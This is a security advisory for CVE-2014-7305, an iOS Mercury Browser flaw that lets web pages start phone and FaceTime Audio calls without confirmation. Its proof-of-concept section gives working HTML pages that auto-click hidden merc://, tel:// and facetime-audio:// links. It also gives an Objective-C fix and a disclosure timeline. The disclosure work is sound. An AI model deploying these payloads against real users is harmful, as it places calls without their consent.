CVE-2014-7305

Title: Issue with FaceTime and FaceTime-Audio URL Schemes on Mercury Browser
Affected Vendor: RichText Web Site
Affected Software: Mercury Browser and Mercury Browser Pro
Affected Version: All known versions on iOS
Issue Type: Lack of user confirmation, allowing an attacker to arbitrarily initiate telephone and FaceTime Audio calls.
Release Date: October 13, 2014
Discovered by: Matias P. Brutti - @S9Labs
CVE Identifier: CVE-2014-7305
Issue Status: No response provided as of 10/13/2014. Still vulnerable.
Description

Andrei Neculaesei (link: http://algorithm.dk/posts/rtfm-0day-in-ios-apps-g-gmail-fb-messenger-etc) described a technique that abuses several iOS applications, including G+, Facebook and Hangouts, to launch phone calls automatically without permission. We looked for a way to exploit the same issue directly from Messages, which according to the author of those vulnerabilities was not possible, and found that it can be done by jumping from the default Safari WebView into a third-party browser through that browser's URL handler.

Mercury Browser registers a known merc:// URL handler, which lets us make the jump from Messages to the vulnerable browser for exploitation. Mercury Browser and Mercury Browser Pro are vulnerable to two attacks: initiating arbitrary telephone calls and initiating arbitrary FaceTime Audio calls. The only case that did not work automatically was initiating a FaceTime (video) call, which correctly prompts the user.

Both browsers are vulnerable because the developer did not handle webView:shouldStartLoadWithRequest:navigationType: so as to prompt the user before a tel:// or facetime-audio:// request is passed on and the call is initiated.

Proof of Concept

For example, if using Messages, an attacker could easily send a friendly-looking link to a malicious or compromised website (e.g. http://evilrovot.com/merc.html). Because Safari will not open tel:// directly and instead shows a pop-up, a two-step approach is needed: the merc:// URL handler opens a new Mercury window on a second page, http://evilrovot.com/tel.html, which triggers the vulnerability.

[ APP RECEIVING LINK ] --> [ SAFARI ] --> [ MERCURY BROWSER ] --> [ TEL ]

The code for these files is as follows:

merc.html

<html>
<body>
<a id="callme" href="merc://evilrovot.com/tel.html" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>

tel.html

<html>
<body>
<a id="callme" href="tel://+0000" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>

ft_audio.html

<html>
<body>
<a id="callme" href="facetime-audio://+0000" style="display:none">click</a>
<script>
var t = document.getElementById("callme");
var fe = document.createEvent("MouseEvents");
fe.initEvent("click", true, true);
t.dispatchEvent(fe);
</script>
</body>
</html>

Recommendations

The ideal behavior is that the browser shows a pop-up asking the user whether he/she wants to start a telephone or FaceTime-Audio conversation with the number in question, and only hands the URL to the system after the user confirms.
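The following is an added example of the recommended behavior, written for this advisory and not taken from the Mercury Browser code base. It assumes a view controller (here hypothetically named BrowserViewController) that owns a UIWebView and acts as its delegate, and it assumes iOS 8 or later for UIAlertController. The delegate method that the advisory names intercepts call-initiating schemes, shows the target number, and returns NO so the web view never loads such a URL on its own:

```objectivec
// Added example, not the vendor's code: a UIWebView delegate that requires
// explicit user confirmation before any call-initiating URL reaches the system.
#import <UIKit/UIKit.h>

@interface BrowserViewController : UIViewController <UIWebViewDelegate>
@end

@implementation BrowserViewController

// Schemes that start an outbound call once the system receives them.
// "facetime" is included as well even though the advisory reports that iOS
// prompts for it; treating all of them the same is the safer default.
- (BOOL)isCallScheme:(NSString *)scheme {
    static NSSet *callSchemes;
    static dispatch_once_t once;
    dispatch_once(&once, ^{
        callSchemes = [NSSet setWithObjects:@"tel", @"telprompt",
                       @"facetime", @"facetime-audio", nil];
    });
    return scheme != nil && [callSchemes containsObject:[scheme lowercaseString]];
}

- (BOOL)webView:(UIWebView *)webView
        shouldStartLoadWithRequest:(NSURLRequest *)request
        navigationType:(UIWebViewNavigationType)navigationType {
    NSURL *url = request.URL;
    if (![self isCallScheme:url.scheme]) {
        return YES; // ordinary navigation, let the web view handle it
    }

    // Show the user exactly which number the page is trying to reach.
    NSString *number = url.resourceSpecifier ?: @"";
    number = [number stringByReplacingOccurrencesOfString:@"//" withString:@""];
    NSString *message = [NSString stringWithFormat:
                         @"This page wants to start a %@ call to %@.",
                         url.scheme, number];

    UIAlertController *alert =
        [UIAlertController alertControllerWithTitle:@"Start call?"
                                            message:message
                                     preferredStyle:UIAlertControllerStyleAlert];
    [alert addAction:[UIAlertAction actionWithTitle:@"Cancel"
                                              style:UIAlertActionStyleCancel
                                            handler:nil]];
    // Only an explicit tap on "Call" passes the URL to the system.
    [alert addAction:[UIAlertAction actionWithTitle:@"Call"
                                              style:UIAlertActionStyleDefault
                                            handler:^(UIAlertAction *action) {
        [[UIApplication sharedApplication] openURL:url];
    }]];
    [self presentViewController:alert animated:YES completion:nil];

    // The web view must never load a call URL itself; the decision above
    // is the only path to openURL:.
    return NO;
}

@end
```

The check keys on the URL scheme rather than on navigationType: a click synthesised by page script, as in the proof-of-concept pages above, is reported to the delegate the same way as a user's tap, so navigationType cannot be used to tell the two apart. Returning NO for every call scheme, with openURL: reachable only from the alert handler, is what restores the confirmation step that the advisory says is missing.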

Timeline

9/22 — Tried to contact the vendor through their Contact Us page at https://mercury-browser.com/contact.html but failed.
9/22 — Tried to contact them through Twitter, but no response was provided.
9/28 — Sent again using the Contact Us page on the main company page - http://www.ilegendsoft.com/.
10/13 — No response provided to date.
10/13 — Vulnerability made public.

Full Write-Up

https://medium.com/section-9-lab/paid-apps-do-come-with-a-price-bc0533a94ff9